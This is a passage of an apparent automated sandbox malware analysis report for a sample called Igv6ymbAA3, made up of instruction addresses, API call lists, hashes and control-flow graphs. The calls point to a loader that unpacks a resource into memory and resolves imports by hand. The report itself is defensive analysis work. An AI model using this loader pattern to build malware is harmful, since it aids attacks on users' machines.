			}

































































































                                                                                                                                                                      0x004019f0
                                                                                                                                                                      0x004019f0
                                                                                                                                                                      0x004019fd
                                                                                                                                                                      0x00401a10
                                                                                                                                                                      0x00401a15
                                                                                                                                                                      0x00401a1a
                                                                                                                                                                      0x00401a1f
                                                                                                                                                                      0x00401a24
                                                                                                                                                                      0x00401a29
                                                                                                                                                                      0x00401a2e
                                                                                                                                                                      0x00401a33
                                                                                                                                                                      0x00401a38
                                                                                                                                                                      0x00401a3d
                                                                                                                                                                      0x00401a42
                                                                                                                                                                      0x00401a47
                                                                                                                                                                      0x00401a4c
                                                                                                                                                                      0x00401a51
                                                                                                                                                                      0x00401a56
                                                                                                                                                                      0x00401a5b
                                                                                                                                                                      0x00401a60
                                                                                                                                                                      0x00401a65
                                                                                                                                                                      0x00401a6a
                                                                                                                                                                      0x00401a6f
                                                                                                                                                                      0x00401a74
                                                                                                                                                                      0x00401a79
                                                                                                                                                                      0x00401a7e
                                                                                                                                                                      0x00401a83
                                                                                                                                                                      0x00401a88
                                                                                                                                                                      0x00401a8d
                                                                                                                                                                      0x00401a92
                                                                                                                                                                      0x00401a97
                                                                                                                                                                      0x00401a9c
                                                                                                                                                                      0x00401aa1
                                                                                                                                                                      0x00401aa6
                                                                                                                                                                      0x00401aab
                                                                                                                                                                      0x00401ab0
                                                                                                                                                                      0x00401ab9
                                                                                                                                                                      0x00401aba
                                                                                                                                                                      0x00401abf
                                                                                                                                                                      0x00401ac7
                                                                                                                                                                      0x0040248d
                                                                                                                                                                      0x0040248d
                                                                                                                                                                      0x00402496
                                                                                                                                                                      0x00401acd
                                                                                                                                                                      0x00401ad6
                                                                                                                                                                      0x00401ae2
                                                                                                                                                                      0x00401ae6
                                                                                                                                                                      0x00401af1
                                                                                                                                                                      0x00401af6
                                                                                                                                                                      0x00401afb
                                                                                                                                                                      0x00401b00
                                                                                                                                                                      0x00401b05
                                                                                                                                                                      0x00401b0a
                                                                                                                                                                      0x00401b0f
                                                                                                                                                                      0x00401b14
                                                                                                                                                                      0x00401b19
                                                                                                                                                                      0x00401b1e
                                                                                                                                                                      0x00401b23
                                                                                                                                                                      0x00401b28
                                                                                                                                                                      0x00401b2d
                                                                                                                                                                      0x00401b32
                                                                                                                                                                      0x00401b37
                                                                                                                                                                      0x00401b3c
                                                                                                                                                                      0x00401b41
                                                                                                                                                                      0x00401b46
                                                                                                                                                                      0x00401b4b
                                                                                                                                                                      0x00401b50
                                                                                                                                                                      0x00401b55
                                                                                                                                                                      0x00401b5a
                                                                                                                                                                      0x00401b5f
                                                                                                                                                                      0x00401b64
                                                                                                                                                                      0x00401b69
                                                                                                                                                                      0x00401b6e
                                                                                                                                                                      0x00401b73
                                                                                                                                                                      0x00401b78
                                                                                                                                                                      0x00401b7d
                                                                                                                                                                      0x00401b85
                                                                                                                                                                      0x00401b8d
                                                                                                                                                                      0x00401b95
                                                                                                                                                                      0x00401b9d
                                                                                                                                                                      0x00401ba4
                                                                                                                                                                      0x00401ba9
                                                                                                                                                                      0x00401bae
                                                                                                                                                                      0x00401bb3
                                                                                                                                                                      0x00401bb8
                                                                                                                                                                      0x00401bbd
                                                                                                                                                                      0x00401bc2
                                                                                                                                                                      0x00401bc7
                                                                                                                                                                      0x00401bcc
                                                                                                                                                                      0x00401bd1
                                                                                                                                                                      0x00401bd6
                                                                                                                                                                      0x00401bdb
                                                                                                                                                                      0x00401be0
                                                                                                                                                                      0x00401be5
                                                                                                                                                                      0x00401bea
                                                                                                                                                                      0x00401bef
                                                                                                                                                                      0x00401bf4
                                                                                                                                                                      0x00401bf9
                                                                                                                                                                      0x00401bfe
                                                                                                                                                                      0x00401c03
                                                                                                                                                                      0x00401c08
                                                                                                                                                                      0x00401c0d
                                                                                                                                                                      0x00401c12
                                                                                                                                                                      0x00401c17
                                                                                                                                                                      0x00401c1c
                                                                                                                                                                      0x00401c21
                                                                                                                                                                      0x00401c26
                                                                                                                                                                      0x00401c2b
                                                                                                                                                                      0x00401c30
                                                                                                                                                                      0x00401c35
                                                                                                                                                                      0x00401c3a
                                                                                                                                                                      0x00401c3f
                                                                                                                                                                      0x00401c44
                                                                                                                                                                      0x00401c48
                                                                                                                                                                      0x00401c4f
                                                                                                                                                                      0x00401dc3
                                                                                                                                                                      0x00401dc4
                                                                                                                                                                      0x00401de0
                                                                                                                                                                      0x00401de2
                                                                                                                                                                      0x00401de7
                                                                                                                                                                      0x00401dec
                                                                                                                                                                      0x00401df1
                                                                                                                                                                      0x00401df6
                                                                                                                                                                      0x00401dfb
                                                                                                                                                                      0x00401e00
                                                                                                                                                                      0x00401e05
                                                                                                                                                                      0x00401e0a
                                                                                                                                                                      0x00401e0f
                                                                                                                                                                      0x00401e14
                                                                                                                                                                      0x00401e19
                                                                                                                                                                      0x00401e1e
                                                                                                                                                                      0x00401e23
                                                                                                                                                                      0x00401e28
                                                                                                                                                                      0x00401e2d
                                                                                                                                                                      0x00401e32
                                                                                                                                                                      0x00401e37
                                                                                                                                                                      0x00401e3c
                                                                                                                                                                      0x00401e41
                                                                                                                                                                      0x00401e46
                                                                                                                                                                      0x00401e4b
                                                                                                                                                                      0x00401e50
                                                                                                                                                                      0x00401e55
                                                                                                                                                                      0x00401e5a
                                                                                                                                                                      0x00401e5f
                                                                                                                                                                      0x00401e64
                                                                                                                                                                      0x00401e69
                                                                                                                                                                      0x00401e6e
                                                                                                                                                                      0x00401e73
                                                                                                                                                                      0x00401e78
                                                                                                                                                                      0x00401e7d
                                                                                                                                                                      0x00401e82
                                                                                                                                                                      0x00401e86
                                                                                                                                                                      0x00401e8b
                                                                                                                                                                      0x00401e96
                                                                                                                                                                      0x00401e9a
                                                                                                                                                                      0x00401ea4
                                                                                                                                                                      0x00401eaf
                                                                                                                                                                      0x00401eba
                                                                                                                                                                      0x00401ebf
                                                                                                                                                                      0x00401ec4
                                                                                                                                                                      0x00401ec6
                                                                                                                                                                      0x00401ecb
                                                                                                                                                                      0x00401ece
                                                                                                                                                                      0x00401ed2
                                                                                                                                                                      0x00401ed4
                                                                                                                                                                      0x00401eef
                                                                                                                                                                      0x00401ed6
                                                                                                                                                                      0x00401edd
                                                                                                                                                                      0x00401ee2
                                                                                                                                                                      0x00401ee6
                                                                                                                                                                      0x00401ee9
                                                                                                                                                                      0x00401ee9
                                                                                                                                                                      0x00401ef7
                                                                                                                                                                      0x00401efc
                                                                                                                                                                      0x00401f02
                                                                                                                                                                      0x00401f08
                                                                                                                                                                      0x00401f0c
                                                                                                                                                                      0x00401f15
                                                                                                                                                                      0x00401f18
                                                                                                                                                                      0x00401f1a
                                                                                                                                                                      0x00401f1c
                                                                                                                                                                      0x00401f22
                                                                                                                                                                      0x00401f22
                                                                                                                                                                      0x00401f24
                                                                                                                                                                      0x00401f28
                                                                                                                                                                      0x00401f2f
                                                                                                                                                                      0x00401f33
                                                                                                                                                                      0x00401f33
                                                                                                                                                                      0x00401f40
                                                                                                                                                                      0x00401f45
                                                                                                                                                                      0x00401f4a
                                                                                                                                                                      0x00401f4b
                                                                                                                                                                      0x00401f50
                                                                                                                                                                      0x00401f58
                                                                                                                                                                      0x00401f58
                                                                                                                                                                      0x00401f58
                                                                                                                                                                      0x00401f58
                                                                                                                                                                      0x00401f33
                                                                                                                                                                      0x00401f63
                                                                                                                                                                      0x00401f63
                                                                                                                                                                      0x00401f69
                                                                                                                                                                      0x00401f72
                                                                                                                                                                      0x00401f72
                                                                                                                                                                      0x00401f72
                                                                                                                                                                      0x00401f73
                                                                                                                                                                      0x00401f75
                                                                                                                                                                      0x00401f7b
                                                                                                                                                                      0x00401f80
                                                                                                                                                                      0x00401f81
                                                                                                                                                                      0x00401f86
                                                                                                                                                                      0x00401f86
                                                                                                                                                                      0x00401f8c
                                                                                                                                                                      0x00401f8d
                                                                                                                                                                      0x00401f8d
                                                                                                                                                                      0x00401f9d
                                                                                                                                                                      0x00401fa2
                                                                                                                                                                      0x00401fa6
                                                                                                                                                                      0x00401fac
                                                                                                                                                                      0x00401faf
                                                                                                                                                                      0x00401fb6
                                                                                                                                                                      0x00401fbf
                                                                                                                                                                      0x00401fc4
                                                                                                                                                                      0x00401fc8
                                                                                                                                                                      0x00401fce
                                                                                                                                                                      0x00401fd3
                                                                                                                                                                      0x00401fe0
                                                                                                                                                                      0x00401fec
                                                                                                                                                                      0x00401ffe
                                                                                                                                                                      0x00402001
                                                                                                                                                                      0x00402006
                                                                                                                                                                      0x0040200b
                                                                                                                                                                      0x00402010
                                                                                                                                                                      0x00402015
                                                                                                                                                                      0x0040201a
                                                                                                                                                                      0x0040201f
                                                                                                                                                                      0x00402024
                                                                                                                                                                      0x00402029
                                                                                                                                                                      0x0040202e
                                                                                                                                                                      0x00402033
                                                                                                                                                                      0x00402038
                                                                                                                                                                      0x0040203d
                                                                                                                                                                      0x00402042
                                                                                                                                                                      0x00402047
                                                                                                                                                                      0x0040204c
                                                                                                                                                                      0x00402051
                                                                                                                                                                      0x00402056
                                                                                                                                                                      0x0040205b
                                                                                                                                                                      0x00402060
                                                                                                                                                                      0x00402065
                                                                                                                                                                      0x0040206a
                                                                                                                                                                      0x0040206f
                                                                                                                                                                      0x00402074
                                                                                                                                                                      0x00402079
                                                                                                                                                                      0x0040207e
                                                                                                                                                                      0x00402083
                                                                                                                                                                      0x00402088
                                                                                                                                                                      0x0040208d
                                                                                                                                                                      0x00402092
                                                                                                                                                                      0x00402097
                                                                                                                                                                      0x0040209c
                                                                                                                                                                      0x004020a1
                                                                                                                                                                      0x004020a5
                                                                                                                                                                      0x004020aa
                                                                                                                                                                      0x004020ae
                                                                                                                                                                      0x004020b4
                                                                                                                                                                      0x004020b6
                                                                                                                                                                      0x004020bb
                                                                                                                                                                      0x004020c0
                                                                                                                                                                      0x004020c5
                                                                                                                                                                      0x004020ca
                                                                                                                                                                      0x004020cf
                                                                                                                                                                      0x004020d4
                                                                                                                                                                      0x004020e1
                                                                                                                                                                      0x004020e6
                                                                                                                                                                      0x004020eb
                                                                                                                                                                      0x004020f0
                                                                                                                                                                      0x004020f5
                                                                                                                                                                      0x004020fa
                                                                                                                                                                      0x004020ff
                                                                                                                                                                      0x00402104
                                                                                                                                                                      0x00402109
                                                                                                                                                                      0x0040210e
                                                                                                                                                                      0x00402113
                                                                                                                                                                      0x00402118
                                                                                                                                                                      0x0040211d
                                                                                                                                                                      0x00402122
                                                                                                                                                                      0x00402127
                                                                                                                                                                      0x0040212c
                                                                                                                                                                      0x00402131
                                                                                                                                                                      0x00402136
                                                                                                                                                                      0x0040213b
                                                                                                                                                                      0x00402140
                                                                                                                                                                      0x00402145
                                                                                                                                                                      0x0040214a
                                                                                                                                                                      0x0040214f
                                                                                                                                                                      0x00402154
                                                                                                                                                                      0x00402159
                                                                                                                                                                      0x0040215e
                                                                                                                                                                      0x00402163
                                                                                                                                                                      0x00402167
                                                                                                                                                                      0x0040216c
                                                                                                                                                                      0x00402171
                                                                                                                                                                      0x00402177
                                                                                                                                                                      0x00402179
                                                                                                                                                                      0x0040217c
                                                                                                                                                                      0x0040217e
                                                                                                                                                                      0x00402183
                                                                                                                                                                      0x00402188
                                                                                                                                                                      0x0040218f
                                                                                                                                                                      0x00402196
                                                                                                                                                                      0x0040219a
                                                                                                                                                                      0x0040219e
                                                                                                                                                                      0x004021a2
                                                                                                                                                                      0x004021a4
                                                                                                                                                                      0x004021bc
                                                                                                                                                                      0x004021be
                                                                                                                                                                      0x004021c0
                                                                                                                                                                      0x004021c6
                                                                                                                                                                      0x004021ca
                                                                                                                                                                      0x004021e5
                                                                                                                                                                      0x004021ec
                                                                                                                                                                      0x004021f1
                                                                                                                                                                      0x00402213
                                                                                                                                                                      0x00402215
                                                                                                                                                                      0x00402217
                                                                                                                                                                      0x0040221d
                                                                                                                                                                      0x00402239
                                                                                                                                                                      0x0040223b
                                                                                                                                                                      0x0040223d
                                                                                                                                                                      0x00402243
                                                                                                                                                                      0x0040224d
                                                                                                                                                                      0x0040224f
                                                                                                                                                                      0x00402251
                                                                                                                                                                      0x00402260
                                                                                                                                                                      0x00402264
                                                                                                                                                                      0x00402269
                                                                                                                                                                      0x00402277
                                                                                                                                                                      0x0040227b
                                                                                                                                                                      0x00402286
                                                                                                                                                                      0x00402293
                                                                                                                                                                      0x004022af
                                                                                                                                                                      0x004022b1
                                                                                                                                                                      0x004022b5
                                                                                                                                                                      0x004022b7
                                                                                                                                                                      0x004022be
                                                                                                                                                                      0x004022be
                                                                                                                                                                      0x004022d7
                                                                                                                                                                      0x004022e8
                                                                                                                                                                      0x004022ef
                                                                                                                                                                      0x004022f6
                                                                                                                                                                      0x00402300
                                                                                                                                                                      0x00402304
                                                                                                                                                                      0x00402308
                                                                                                                                                                      0x00402315
                                                                                                                                                                      0x0040231a
                                                                                                                                                                      0x0040231e
                                                                                                                                                                      0x00402324
                                                                                                                                                                      0x00402328
                                                                                                                                                                      0x0040232a
                                                                                                                                                                      0x00402331
                                                                                                                                                                      0x00402331
                                                                                                                                                                      0x0040234e
                                                                                                                                                                      0x00402350
                                                                                                                                                                      0x00402352
                                                                                                                                                                      0x00402355
                                                                                                                                                                      0x00402355
                                                                                                                                                                      0x0040235b
                                                                                                                                                                      0x0040235f
                                                                                                                                                                      0x00402361
                                                                                                                                                                      0x00402368
                                                                                                                                                                      0x00402368
                                                                                                                                                                      0x0040236d
                                                                                                                                                                      0x00402371
                                                                                                                                                                      0x00402373
                                                                                                                                                                      0x00402375
                                                                                                                                                                      0x0040237b
                                                                                                                                                                      0x0040237b
                                                                                                                                                                      0x00402377
                                                                                                                                                                      0x00402377
                                                                                                                                                                      0x00402377
                                                                                                                                                                      0x00402390
                                                                                                                                                                      0x00402396
                                                                                                                                                                      0x0040239c
                                                                                                                                                                      0x004023a0
                                                                                                                                                                      0x004023a2
                                                                                                                                                                      0x004023a9
                                                                                                                                                                      0x004023a9
                                                                                                                                                                      0x004023ae
                                                                                                                                                                      0x004023b2
                                                                                                                                                                      0x004023b4
                                                                                                                                                                      0x004023ba
                                                                                                                                                                      0x004023ba
                                                                                                                                                                      0x004023b6
                                                                                                                                                                      0x004023b6
                                                                                                                                                                      0x004023b6
                                                                                                                                                                      0x004023ce
                                                                                                                                                                      0x004023d1
                                                                                                                                                                      0x004023d3
                                                                                                                                                                      0x004023dd
                                                                                                                                                                      0x004023ec
                                                                                                                                                                      0x004023ef
                                                                                                                                                                      0x004023fe
                                                                                                                                                                      0x00402401
                                                                                                                                                                      0x00402403
                                                                                                                                                                      0x00402411
                                                                                                                                                                      0x00402417
                                                                                                                                                                      0x00402424
                                                                                                                                                                      0x00402426
                                                                                                                                                                      0x0040242a
                                                                                                                                                                      0x0040242c
                                                                                                                                                                      0x00402434
                                                                                                                                                                      0x00402434
                                                                                                                                                                      0x0040243a
                                                                                                                                                                      0x0040243f
                                                                                                                                                                      0x00402443
                                                                                                                                                                      0x00402445
                                                                                                                                                                      0x0040244d
                                                                                                                                                                      0x0040244d
                                                                                                                                                                      0x00402445
                                                                                                                                                                      0x00402251
                                                                                                                                                                      0x0040223d
                                                                                                                                                                      0x0040244f
                                                                                                                                                                      0x0040245d
                                                                                                                                                                      0x0040245f
                                                                                                                                                                      0x00402461
                                                                                                                                                                      0x00402462
                                                                                                                                                                      0x00402467
                                                                                                                                                                      0x00402467
                                                                                                                                                                      0x0040245f
                                                                                                                                                                      0x004021ca
                                                                                                                                                                      0x0040246a
                                                                                                                                                                      0x0040246e
                                                                                                                                                                      0x00402470
                                                                                                                                                                      0x00402478
                                                                                                                                                                      0x00402478
                                                                                                                                                                      0x0040247a
                                                                                                                                                                      0x0040247e
                                                                                                                                                                      0x00402480
                                                                                                                                                                      0x00402488
                                                                                                                                                                      0x00402488
                                                                                                                                                                      0x00402480
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c55
                                                                                                                                                                      0x00401c62
                                                                                                                                                                      0x00401c67
                                                                                                                                                                      0x00401c6a
                                                                                                                                                                      0x00401c6c
                                                                                                                                                                      0x00401c73
                                                                                                                                                                      0x00401c73
                                                                                                                                                                      0x00401c77
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c7b
                                                                                                                                                                      0x00401c8f
                                                                                                                                                                      0x00401c8f
                                                                                                                                                                      0x00401c7d
                                                                                                                                                                      0x00401c7d
                                                                                                                                                                      0x00401c83
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c85
                                                                                                                                                                      0x00401c85
                                                                                                                                                                      0x00401c88
                                                                                                                                                                      0x00401c8d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c8d
                                                                                                                                                                      0x00401c83
                                                                                                                                                                      0x00401c98
                                                                                                                                                                      0x00401c9a
                                                                                                                                                                      0x00401cbd
                                                                                                                                                                      0x00401cc2
                                                                                                                                                                      0x00401cc5
                                                                                                                                                                      0x00401cc7
                                                                                                                                                                      0x00401cd0
                                                                                                                                                                      0x00401cd0
                                                                                                                                                                      0x00401cd2
                                                                                                                                                                      0x00401cd4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401cd6
                                                                                                                                                                      0x00401cd8
                                                                                                                                                                      0x00401cec
                                                                                                                                                                      0x00401cec
                                                                                                                                                                      0x00401cda
                                                                                                                                                                      0x00401cda
                                                                                                                                                                      0x00401cdd
                                                                                                                                                                      0x00401ce0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401ce2
                                                                                                                                                                      0x00401ce2
                                                                                                                                                                      0x00401ce5
                                                                                                                                                                      0x00401ce8
                                                                                                                                                                      0x00401cea
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401cea
                                                                                                                                                                      0x00401ce0
                                                                                                                                                                      0x00401cf5
                                                                                                                                                                      0x00401cf5
                                                                                                                                                                      0x00401cf7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401cf9
                                                                                                                                                                      0x00401d02
                                                                                                                                                                      0x00401d07
                                                                                                                                                                      0x00401d09
                                                                                                                                                                      0x00401d10
                                                                                                                                                                      0x00401d1d
                                                                                                                                                                      0x00401d22
                                                                                                                                                                      0x00401d25
                                                                                                                                                                      0x00401d27
                                                                                                                                                                      0x00401d30
                                                                                                                                                                      0x00401d30
                                                                                                                                                                      0x00401d32
                                                                                                                                                                      0x00401d34
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d36
                                                                                                                                                                      0x00401d38
                                                                                                                                                                      0x00401d4c
                                                                                                                                                                      0x00401d4c
                                                                                                                                                                      0x00401d3a
                                                                                                                                                                      0x00401d3a
                                                                                                                                                                      0x00401d3d
                                                                                                                                                                      0x00401d40
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d42
                                                                                                                                                                      0x00401d42
                                                                                                                                                                      0x00401d45
                                                                                                                                                                      0x00401d48
                                                                                                                                                                      0x00401d4a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d4a
                                                                                                                                                                      0x00401d40
                                                                                                                                                                      0x00401d55
                                                                                                                                                                      0x00401d55
                                                                                                                                                                      0x00401d57
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d5d
                                                                                                                                                                      0x00401d6a
                                                                                                                                                                      0x00401d6f
                                                                                                                                                                      0x00401d72
                                                                                                                                                                      0x00401d74
                                                                                                                                                                      0x00401d80
                                                                                                                                                                      0x00401d80
                                                                                                                                                                      0x00401d82
                                                                                                                                                                      0x00401d84
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d86
                                                                                                                                                                      0x00401d88
                                                                                                                                                                      0x00401d9c
                                                                                                                                                                      0x00401d9c
                                                                                                                                                                      0x00401d8a
                                                                                                                                                                      0x00401d8a
                                                                                                                                                                      0x00401d8d
                                                                                                                                                                      0x00401d90
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d92
                                                                                                                                                                      0x00401d92
                                                                                                                                                                      0x00401d95
                                                                                                                                                                      0x00401d98
                                                                                                                                                                      0x00401d9a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d9a
                                                                                                                                                                      0x00401d90
                                                                                                                                                                      0x00401da5
                                                                                                                                                                      0x00401da5
                                                                                                                                                                      0x00401da7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401da7
                                                                                                                                                                      0x00401da0
                                                                                                                                                                      0x00401da2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401da2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d57
                                                                                                                                                                      0x00401d50
                                                                                                                                                                      0x00401d52
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401dad
                                                                                                                                                                      0x00401db6
                                                                                                                                                                      0x00401dbb
                                                                                                                                                                      0x00401dbb
                                                                                                                                                                      0x00401d10
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401d09
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401cf7
                                                                                                                                                                      0x00401cf0
                                                                                                                                                                      0x00401cf2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c9c
                                                                                                                                                                      0x00401c9c
                                                                                                                                                                      0x00401c9d
                                                                                                                                                                      0x00401caf
                                                                                                                                                                      0x00401caf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c9a
                                                                                                                                                                      0x00401c93
                                                                                                                                                                      0x00401c95
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c95
                                                                                                                                                                      0x00401c4f
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                      • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                      • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                      • API String ID: 2366190142-2962942730
                                                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 272 241092b-2410970 GetPEB 273 2410972-2410978 272->273 274 241097a-241098a call 2410d35 273->274 275 241098c-241098e 273->275 274->275 280 2410992-2410994 274->280 275->273 277 2410990 275->277 279 2410996-2410998 277->279 281 2410a3b-2410a3e 279->281 280->279 282 241099d-24109d3 280->282 283 24109dc-24109ee call 2410d0c 282->283 286 24109f0-2410a3a 283->286 287 24109d5-24109d8 283->287 286->281 287->283
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                      • Instruction ID: 4f9a24d4beb2f864b0690ed8075debfc4363c4abcf8bde153940562250d0b4d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                      • Instruction Fuzzy Hash: 673127B6910609DFDB10CF99C880AAEBBF9FF48324F15504AD841AB354D771EA85CFA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 156 241003c-2410047 157 2410049 156->157 158 241004c-2410263 call 2410a3f call 2410e0f call 2410d90 VirtualAlloc 156->158 157->158 173 2410265-2410289 call 2410a69 158->173 174 241028b-2410292 158->174 179 24102ce-24103c2 VirtualProtect call 2410cce call 2410ce7 173->179 176 24102a1-24102b0 174->176 178 24102b2-24102cc 176->178 176->179 178->176 185 24103d1-24103e0 179->185 186 24103e2-2410437 call 2410ce7 185->186 187 2410439-24104b8 VirtualFree 185->187 186->185 189 24105f4-24105fe 187->189 190 24104be-24104cd 187->190 193 2410604-241060d 189->193 194 241077f-2410789 189->194 192 24104d3-24104dd 190->192 192->189 198 24104e3-2410505 LoadLibraryA 192->198 193->194 199 2410613-2410637 193->199 196 24107a6-24107b0 194->196 197 241078b-24107a3 194->197 200 24107b6-24107cb 196->200 201 241086e-24108be LoadLibraryA 196->201 197->196 202 2410517-2410520 198->202 203 2410507-2410515 198->203 204 241063e-2410648 199->204 205 24107d2-24107d5 200->205 208 24108c7-24108f9 201->208 206 2410526-2410547 202->206 203->206 204->194 207 241064e-241065a 204->207 209 2410824-2410833 205->209 210 24107d7-24107e0 205->210 211 241054d-2410550 206->211 207->194 212 2410660-241066a 207->212 213 2410902-241091d 208->213 214 24108fb-2410901 208->214 220 2410839-241083c 209->220 215 24107e2 210->215 216 24107e4-2410822 210->216 217 24105e0-24105ef 211->217 218 2410556-241056b 211->218 219 241067a-2410689 212->219 214->213 215->209 216->205 217->192 221 241056d 218->221 222 241056f-241057a 218->222 223 2410750-241077a 219->223 224 241068f-24106b2 219->224 220->201 225 241083e-2410847 220->225 221->217 231 241059b-24105bb 222->231 232 241057c-2410599 222->232 223->204 226 24106b4-24106ed 224->226 227 24106ef-24106fc 224->227 228 2410849 225->228 229 241084b-241086c 225->229 226->227 233 241074b 227->233 234 24106fe-2410748 227->234 228->201 229->220 239 24105bd-24105db 231->239 232->239 233->219 234->233 239->211
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0241024D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
